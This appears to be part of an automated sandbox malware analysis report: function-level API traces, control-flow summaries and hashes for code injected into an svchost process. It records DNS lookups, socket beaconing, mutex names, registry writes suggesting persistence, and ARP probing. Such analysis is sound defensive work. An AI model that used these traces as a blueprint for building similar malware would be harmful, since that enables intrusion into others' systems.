                                                                                                                                                                                • API String ID: 2496840489-0
                                                                                                                                                                                • Opcode ID: 0551faee1106222f397e1c8bf519b9188c21c7dca297eb718ad6f420bc45b75c
                                                                                                                                                                                • Instruction ID: ed5b5b64522fe66a5ea052113b0c2f9187125999cf5ff2d51e395da3c559b608
                                                                                                                                                                                • Opcode Fuzzy Hash: 0551faee1106222f397e1c8bf519b9188c21c7dca297eb718ad6f420bc45b75c
                                                                                                                                                                                • Instruction Fuzzy Hash: 40A1C075D40289EFCB01CFA8CD84DDEBBB9AF15304F2940A9E944B7251DB31AE44CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 169 1314e335-1314e35b GetTickCount 170 1314e362-1314e390 call 13144d1b #9 169->170 173 1314e393-1314e399 170->173 174 1314e3f9 173->174 175 1314e39b-1314e3c5 call 13142f89 DnsQuery_A 173->175 177 1314e3fb-1314e401 174->177 183 1314e3c7-1314e3eb call 13144d1b DnsRecordListFree 175->183 184 1314e3f0-1314e3f7 175->184 179 1314e472-1314e47f 177->179 180 1314e403-1314e409 177->180 181 1314e481-1314e488 179->181 182 1314e49a-1314e4ba call 13142f89 call 131506de 179->182 185 1314e467-1314e470 180->185 186 1314e40b-1314e44f #23 #21 #4 180->186 187 1314e489-1314e48b 181->187 182->170 198 1314e4c0-1314e4c6 182->198 183->184 184->173 184->174 185->177 185->179 190 1314e461-1314e462 #3 186->190 191 1314e451-1314e45c #16 186->191 192 1314e494-1314e498 187->192 193 1314e48d 187->193 190->185 191->190 192->182 192->187 193->192 198->170 199 1314e4cc-1314e4da Sleep 198->199 199->198 200 1314e4dc 199->200 200->170
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32(00000000,76B7EA30,00000000), ref: 1314E347
                                                                                                                                                                                • #9.WS2_32(00000019,?,?,00000000), ref: 1314E387
                                                                                                                                                                                • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000,?,00000019,?,?,?,?,?,00000000), ref: 1314E3BE
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?,00000000,?,00000019,?,?,?,?,?,00000000), ref: 1314E3EB
                                                                                                                                                                                • #23.WS2_32(00000002,00000001,00000006,-00000004,00000001,00000000,00000000,?,00000000,?,00000019), ref: 1314E411
                                                                                                                                                                                • #21.WS2_32(00000000,0000FFFF,00001006,?,00000008,00000002,00000001,00000006,-00000004,00000001,00000000,00000000,?,00000000,?,00000019), ref: 1314E433
                                                                                                                                                                                • #4.WS2_32(00000000,00000002,00000010,00000000,0000FFFF,00001006,?,00000008,00000002,00000001,00000006,-00000004,00000001,00000000,00000000,?), ref: 1314E448
                                                                                                                                                                                • #16.WS2_32(00000000,1468EA2E,00000064,00000000,00000000,00000002,00000010,00000000,0000FFFF,00001006,?,00000008,00000002,00000001,00000006,-00000004), ref: 1314E45C
                                                                                                                                                                                • #3.WS2_32(00000000,00000000,00000002,00000010,00000000,0000FFFF,00001006,?,00000008,00000002,00000001,00000006,-00000004,00000001,00000000,00000000), ref: 1314E462
                                                                                                                                                                                • Sleep.KERNEL32(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4D1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountFreeListQuery_RecordSleepTick
                                                                                                                                                                                • String ID: 0u
                                                                                                                                                                                • API String ID: 2343174039-3203441087
                                                                                                                                                                                • Opcode ID: c4891b3a70c0979d9b2374d91d66c2f0aa2713803c4fdafd80586a737ac18e5e
                                                                                                                                                                                • Instruction ID: 3abf82c69722f3967bdfbc74bbd690c7064bfefbac1ba47bfefbd6294108a016
                                                                                                                                                                                • Opcode Fuzzy Hash: c4891b3a70c0979d9b2374d91d66c2f0aa2713803c4fdafd80586a737ac18e5e
                                                                                                                                                                                • Instruction Fuzzy Hash: B341F072944359BBEB129BA8CC81AEEB77CFF15B08F180439E649B7180E77469448B61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13145427: CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314334E,00016B00,LoadLibraryExA,?), ref: 1314543F
                                                                                                                                                                                • #115.WS2_32(00000202,?,00016B00,LoadLibraryExA,?), ref: 1314335A
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13143365
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 131433C2
                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 131433CA
                                                                                                                                                                                • OpenMutexA.KERNEL32(00020000,00000000,rjsfitz60229,00000000,00000202,?,00016B00,LoadLibraryExA,?), ref: 131433D8
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 131433ED
                                                                                                                                                                                  • Part of subcall function 1314AD4E: RegOpenKeyExA.ADVAPI32(80000002,-00000004,000000EA,00000000,000F003F,131433FC), ref: 1314AD7C
                                                                                                                                                                                  • Part of subcall function 1314AD4E: RegSetValueExA.ADVAPI32(131433FC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314ADA1
                                                                                                                                                                                  • Part of subcall function 1314AD4E: RegCloseKey.ADVAPI32(131433FC), ref: 1314ADAA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpen$#115CountCreateExitFileHandleMutexProcessSleepTickValue
                                                                                                                                                                                • String ID: LoadLibraryExA$rjsfitz60229$rxzhsef91571$wnyqpjt13409
                                                                                                                                                                                • API String ID: 1808700921-2952085752
                                                                                                                                                                                • Opcode ID: 965f3d8219d039e1fc520c4488c4ba020a51fddd4f67c41b5b7b0c04f2972646
                                                                                                                                                                                • Instruction ID: 8a80587115f15fefb65b334c3320f1afafce057311b930bd89483dacacd9f4c7
                                                                                                                                                                                • Opcode Fuzzy Hash: 965f3d8219d039e1fc520c4488c4ba020a51fddd4f67c41b5b7b0c04f2972646
                                                                                                                                                                                • Instruction Fuzzy Hash: A71198B6600355AFE710BBBD8DC5B5E765CEB05658F390835EA08D2544FF38A8118A71
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • #57.WS2_32(?,00000040,?,?,?,?,?,?,?,?,?,?,131462CA,?), ref: 13146239
                                                                                                                                                                                • #52.WS2_32(?,?,00000040,?,?,?,?,?,?,?,?,?,?,131462CA,?), ref: 13146242
                                                                                                                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?,00000040,?,?,?,?,?,?,?,?,?,?,131462CA,?), ref: 1314626B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SendARP,?,?,?,?,?,?,?,?,?,?,131462CA,?), ref: 1314627D
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,131462CA,?), ref: 13146288
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                • String ID: LoadLibraryExA$SendARP$iphlpapi.dll
                                                                                                                                                                                • API String ID: 145871493-444255208
                                                                                                                                                                                • Opcode ID: 63d9c93c3878eea5f39d741568cbe5cdfc3c01f2e029f048b2aa2319c6185dc9
                                                                                                                                                                                • Instruction ID: 5354f2f1f209b7a01f4b35da72f9dcbe16b16dcda766e66485e1e535770a51d0
                                                                                                                                                                                • Opcode Fuzzy Hash: 63d9c93c3878eea5f39d741568cbe5cdfc3c01f2e029f048b2aa2319c6185dc9
                                                                                                                                                                                • Instruction Fuzzy Hash: AC117076E10319FBDB01ABB4CD8AFDE7BACAF08658F144574F901E6140E778E64486A1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 250 13143212-13143240 GetCurrentThreadId CreateThread 251 13143242-13143244 250->251 252 13143249-1314325b CreateThread 250->252 253 131432d0-131432d4 251->253 252->251 254 1314325d-1314326b Sleep 252->254 255 13143273-1314327a 254->255 256 13143291-131432a4 CreateThread 255->256 257 1314327c-1314328f Sleep 255->257 256->251 258 131432a6-131432b8 CreateThread 256->258 257->255 257->256 258->251 259 131432ba-131432ce CreateThread 258->259 259->253
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32(00020000,76B5EEA0,00000000,?,1314340F), ref: 13143216
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,1314AC90,00000000,00000000,1315B698,?,1314340F), ref: 1314323C
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,1314E335,00000000,00000000,1315B684,?,1314340F), ref: 13143257
                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,1314340F), ref: 13143269
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 13143281
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,131460AA,00000000,00000000,1315B688), ref: 1314329F
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,131448A8,00000000,00000000,1315B68C), ref: 131432B4
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,1314CCE7,00000000,00000000,1315B694), ref: 131432C8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Thread$Create$Sleep$Current
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 773548574-0
                                                                                                                                                                                • Opcode ID: d125012d3972e69df1683d7a917f2bca7c5ad83ee571bde9b23c96734ccfa98c
                                                                                                                                                                                • Instruction ID: 8fd118986bc5cf1931c0d32a12ebccf3781935e800841fb4d7bc385c2169f3f6
                                                                                                                                                                                • Opcode Fuzzy Hash: d125012d3972e69df1683d7a917f2bca7c5ad83ee571bde9b23c96734ccfa98c
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C11E1F074539A7FFA106B728CC4DB73AACFB92B8AB204935F421E2086D7649C005970
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 131453DC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                  • Part of subcall function 131453DC: PathAddBackslashA.SHLWAPI(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                  • Part of subcall function 131453DC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 1314ACA4
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1314ACB7
                                                                                                                                                                                • wnsprintfA.SHLWAPI(?,0000000C,131413B8), ref: 1314ACD3
                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,-00000004,00000071,00000000,000F003F,?), ref: 1314ACFA
                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,-00000004,00000070,00000000,00000001,?,00000104), ref: 1314AD36
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 1314AD3F
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1314AD4A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PathSleep$AppendBackslashCloseEnvironmentOpenValueVariablelstrlenwnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3351196999-0
                                                                                                                                                                                • Opcode ID: df98af59c271cf4eb92abddb90ebf49f7c78599eddc4f688432b86f896bc466f
                                                                                                                                                                                • Instruction ID: e8ac087ec537ef643a7e4e5b40512e915baa8ea1b42b2ab4850eaaa40f01f91f
                                                                                                                                                                                • Opcode Fuzzy Hash: df98af59c271cf4eb92abddb90ebf49f7c78599eddc4f688432b86f896bc466f
                                                                                                                                                                                • Instruction Fuzzy Hash: 40113D75A40219FFEB14ABA4CD45FEE7B7CAB04709F200070E605B6185E7B5AA44DB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 276 13144bd5-13144beb HeapCreate 277 13144c23-13144c2e 276->277 278 13144bed-13144c03 HeapCreate 276->278 279 13144c05-13144c15 HeapCreate 278->279 280 13144c22 278->280 279->280 281 13144c17-13144c1d GetProcessHeap 279->281 280->277 281->280
                                                                                                                                                                                APIs
                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,LoadLibraryExA,?,1314338F,00000000,00000202,?,00016B00,LoadLibraryExA,?), ref: 13144BE2
                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,001E8480,1DCD6500,00016B00), ref: 13144BFA
                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,001E8480,05F5E100), ref: 13144C0C
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 13144C17
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Create$Process
                                                                                                                                                                                • String ID: LoadLibraryExA
                                                                                                                                                                                • API String ID: 846323464-2601528877
                                                                                                                                                                                • Opcode ID: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                • Instruction ID: df309c537f147d9e7df735f2a449fb756469b5c2332ceeb35925c3edc0e0c3b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                • Instruction Fuzzy Hash: 90F0A7B1A012A56BCB04AF364EC0C4BAFDCE349358364AC3EF105D2504FB38884587B0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                • PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Path$AppendBackslashEnvironmentVariablelstrlen
                                                                                                                                                                                • String ID: C:\Windows\system32\regedit.exe$LoadLibraryExA
                                                                                                                                                                                • API String ID: 3711117582-2466685467
                                                                                                                                                                                • Opcode ID: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                • Instruction ID: 40d1b3cb4e87c1594f7b209ae58ce819227e3fa9e4917f1197cc4b9cdaa05ffb
                                                                                                                                                                                • Opcode Fuzzy Hash: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE09A76B4023067EA0077A58C4EFDA7A2CCB00A99B440030F902F92C0EB94E54286A9
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 289 1314cce7-1314cd12 call 13144ff4 292 1314cd14 289->292 293 1314cd15-1314cd2a Sleep call 13144d1b 292->293 295 1314cd2f-1314cd83 call 13144d1b call 13144eb1 * 2 call 131518db call 13144ec3 * 2 293->295 295->293 308 1314cd85-1314cd8a 295->308 309 1314cda6-1314cde2 #18 call 13144eb1 * 2 308->309 310 1314cd8c-1314cd9c call 1314bda1 308->310 319 1314ced8-1314ceed call 13144d1b 309->319 320 1314cde8-1314cdee 309->320 316 1314cda0-1314cda4 310->316 317 1314cd9e 310->317 316->309 316->310 317->316 327 1314cef3-1314cf00 319->327 328 1314cfcc-1314cfe3 call 13144ec3 * 2 319->328 320->319 321 1314cdf4-1314cdfa 320->321 321->319 323 1314ce00-1314ce0d 321->323 325 1314ce13-1314ce24 #151 323->325 326 1314cec9-1314ced2 323->326 325->326 329 1314ce2a-1314ce36 call 1314beaa 325->329 326->319 326->323 330 1314cf06-1314cf09 327->330 331 1314cfbd-1314cfc6 327->331 328->292 329->326 342 1314ce3c-1314ce3f 329->342 330->331 334 1314cf0f-1314cf14 330->334 331->327 331->328 337 1314cf16-1314cf24 call 1315186f 334->337 338 1314cf29-1314cf32 334->338 337->331 340 1314cf34-1314cf40 call 1314bc08 338->340 341 1314cf6b-1314cf87 call 13151bf3 call 1314c147 338->341 355 1314cf42-1314cf4c call 131513df 340->355 356 1314cf4e-1314cf69 call 1314bd15 GetTickCount 340->356 368 1314cfb3 341->368 369 1314cf89-1314cf9b call 1314c0cc 341->369 348 1314ce95-1314ce9b 342->348 349 1314ce41-1314ce45 342->349 348->326 352 1314ce9d-1314cea6 call 1314b1c8 348->352 353 1314ce47-1314ce4e 349->353 354 1314ce50-1314ce53 349->354 352->326 370 1314cea8-1314ceab 352->370 353->326 359 1314ce75-1314ce78 354->359 360 1314ce55-1314ce5e call 1314c081 354->360 355->337 356->331 363 1314ce89 359->363 364 1314ce7a-1314ce87 359->364 377 1314ce64-1314ce72 call 13144c2f 360->377 378 1314ce60-1314ce62 360->378 373 1314ce8b-1314ce93 call 1314b0e3 363->373 364->373 379 1314cfb5-1314cfb8 call 13151be5 368->379 369->379 386 1314cf9d-1314cfae call 131513df call 1315186f 369->386 370->326 376 1314cead-1314ceb6 call 1314c081 370->376 373->378 376->378 390 1314ceb8-1314cec6 call 13144c2f 376->390 377->359 378->326 379->331 386->368 390->326
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 1314CD17
                                                                                                                                                                                  • Part of subcall function 13144D1B: _memset.LIBCMT ref: 13144D39
                                                                                                                                                                                  • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004,00000049,00000000,00000002), ref: 13144EBC
                                                                                                                                                                                  • Part of subcall function 131518DB: EnterCriticalSection.KERNEL32(05615230,13161EF0,00000000,05615228,05615228,?,1314CD65,?,13161EF0,131616E8), ref: 131518EE
                                                                                                                                                                                  • Part of subcall function 131518DB: LeaveCriticalSection.KERNEL32(05615230,?,1314CD65,?), ref: 131518FB
                                                                                                                                                                                  • Part of subcall function 13144EC3: LeaveCriticalSection.KERNEL32(00000000,1314E31B,?,00000000,00000000,-00000004,00000049,00000000,00000002), ref: 13144ECE
                                                                                                                                                                                • #18.WS2_32(00000000,13161EF0,00000000,131616E8,?,131616E8), ref: 1314CDC0
                                                                                                                                                                                • #151.WS2_32(?,13161EF0,00000000,131616E8,?,131616E8), ref: 1314CE1D
                                                                                                                                                                                • GetTickCount.KERNEL32(131616E8,?,131616E8), ref: 1314CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$#151CountSleepTick_memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3011505987-0
                                                                                                                                                                                • Opcode ID: a87d7cb2f4d1dcf16125fba73d78010f682d956b39e77f908425a8bdc16e74d6
                                                                                                                                                                                • Instruction ID: 8757cdd0e8f0453b9c503d8fe05b6102780d6c7efeff28d5d7c0a94bffacdc5e
                                                                                                                                                                                • Opcode Fuzzy Hash: a87d7cb2f4d1dcf16125fba73d78010f682d956b39e77f908425a8bdc16e74d6
                                                                                                                                                                                • Instruction Fuzzy Hash: 49818B75900316FFCF10DFA8D99099EBBF9EF05314B35093AE511B3294DB38AA518BA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13144937
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,13144394,?,00000000,00000000,?,?), ref: 13144AB2
                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?), ref: 13144B06
                                                                                                                                                                                • Sleep.KERNEL32(00000032,?,?,?), ref: 13144B25
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep$CreateExitProcessThreadlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409902211-0
                                                                                                                                                                                • Opcode ID: 075d2d43036dfda88634d388792c9ee31814f1ab77880507ee4d07b56597f8e7
                                                                                                                                                                                • Instruction ID: 6d998106411ceb65381bfd4e6dc3443c2a6c4742902684d26abc5299e1fbab67
                                                                                                                                                                                • Opcode Fuzzy Hash: 075d2d43036dfda88634d388792c9ee31814f1ab77880507ee4d07b56597f8e7
                                                                                                                                                                                • Instruction Fuzzy Hash: B9710276A80360EFC715EF99C9C5E5A7BF8FB86758F34002AE505E7244EB78A440CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersion.KERNEL32(00020000,76B5EEA0,00000000), ref: 1314303C
                                                                                                                                                                                • GetCommandLineA.KERNEL32(00000000,0000004A,00000000,0000003C), ref: 13143096
                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,00000000,0000007B), ref: 131430B7
                                                                                                                                                                                • #11.WS2_32(00000000,000000DA), ref: 131430E2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CommandLineVersion
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3524817977-0
                                                                                                                                                                                • Opcode ID: 927331d0862d68af6c66a9af488f4f42537ad54922723841a68ae1c07e7ac391
                                                                                                                                                                                • Instruction ID: 0fbd0b764bc663820d1229e05fab6f52f8099b08dd94ad2b4e0f19df9f21a017
                                                                                                                                                                                • Opcode Fuzzy Hash: 927331d0862d68af6c66a9af488f4f42537ad54922723841a68ae1c07e7ac391
                                                                                                                                                                                • Instruction Fuzzy Hash: B151A779740355BBE724ABA9CC8DF9A3B29EB82B18F14043DF145962C0EBB4A444CA65
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000000,76B5EEA0,13143401), ref: 131432EF
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000000), ref: 13143303
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 32694325-0
                                                                                                                                                                                • Opcode ID: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                • Instruction ID: 36019c5d3645fadee2bcba3f0f1670733127cd8a2b67beb26c680348bd35dee3
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1CF054B1A443316BFF08EBFD6D667962E9C9B49364F244437F505D2184EFA48001DAF0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004,00000049,00000000,00000002), ref: 13144EBC
                                                                                                                                                                                  • Part of subcall function 13144EC3: LeaveCriticalSection.KERNEL32(00000000,1314E31B,?,00000000,00000000,-00000004,00000049,00000000,00000002), ref: 13144ECE
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 131460FF
                                                                                                                                                                                • Sleep.KERNEL32(00000064,-00000004,0000003F,00000000), ref: 1314614E
                                                                                                                                                                                  • Part of subcall function 1315182B: EnterCriticalSection.KERNEL32(05615230,00000000,00000000,76B26490,131461DD,00000000,00000000,000000FF), ref: 13151834
                                                                                                                                                                                  • Part of subcall function 1315182B: LeaveCriticalSection.KERNEL32(05615230), ref: 13151845
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 131461F6
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1314620F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSectionSleep$EnterLeave
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 890587828-0
                                                                                                                                                                                • Opcode ID: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                • Instruction ID: aa9922c8d6f98b1bcbd01e6166526c1982ba4151100d3d07f382ebb813d1f31a
                                                                                                                                                                                • Opcode Fuzzy Hash: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B313974A00320EFCF15ABA8CD91A6C7666AF82A3CF380A35E451761D5DF74A941C790
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

